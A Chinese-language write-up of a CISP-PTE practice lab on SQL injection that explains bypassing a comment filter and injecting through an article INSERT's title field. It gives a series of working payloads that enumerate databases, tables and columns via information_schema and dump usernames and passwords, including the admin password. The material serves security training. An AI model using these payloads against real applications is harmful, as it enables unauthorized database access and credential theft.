CISP-PTE 练习题目-sql注入1

CISP-PTE 练习题目-sql注入1

题目地址：http://49.232.193.10:81/

进入界面显示

​ 尝试万能密码注入‘ or 1=1#等注入，均失败。注册个账号看看登录进内部还有什么内容

​ 登录后发现题目提示了代码过滤规则，给出strstr()和str_replace()函数介绍

​ 可知我们输入的sql语句会循环过滤调注释符’#‘和’–‘，并且先过滤’–‘后过滤’#‘。尝试绕过过滤，构造末尾有空格，过滤后即为–（空格），达到注释的目的。

​ 在文章发布的地方，尝试发布内容，系统提示了注入语句。

​ insert article1 value(‘$pagram1’, 标题，内容，用户名)

​ 尝试insert注入，我们可以选择在标题和内容的字段注入。但是在内容处注入，由于需要闭合’‘，我们所需执行的sql语句被单引号‘包裹，不能回显执行全部内容，如同 '+ascii(substr((select database()),1,1))+'此类盲注，所以选择在标题处进行注入。标题处注入，可以闭合标题，将内容作为sql语句执行结果回显，用户名后面的语句进行注释。

​ 标题处构造payload：version',(select version()),'hzj') #-#---

​ 结果发现，系统没有过滤空格等特殊符号及大小写，我们按部就班进行查库查表查字段

​ 查当前数据库，payload：database',(select database()),'hzj') #-#---

​ 查所有数据库， payload：schema_name',(select group_concat(schema_name) from information_schema.schemata),'hzj')#-#---

​ 发现有数据库名为2web的可疑，查该数据库下所有表， payload：table_name',(select group_concat(table_name) from information_schema.tables where table_schema='2web'),'hzj')#-#---

​ 发现有3个表，查询users1列名，payload：column_name',(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='users1'),'hzj')#-#---

​ 发现有username，password两列，尝试爆出users1的所有数据，payload：users1',(select group_concat(username,'_',password) from users1),'hzj')#-#---

可能对insert插入字段字符串长度做了限制，查询长度过长，所以我们尝试查admin的password，payload：users1',(select group_concat(username,'_',password) from users1 where username='admin'),'hzj')#-#---

​ 拿到key1。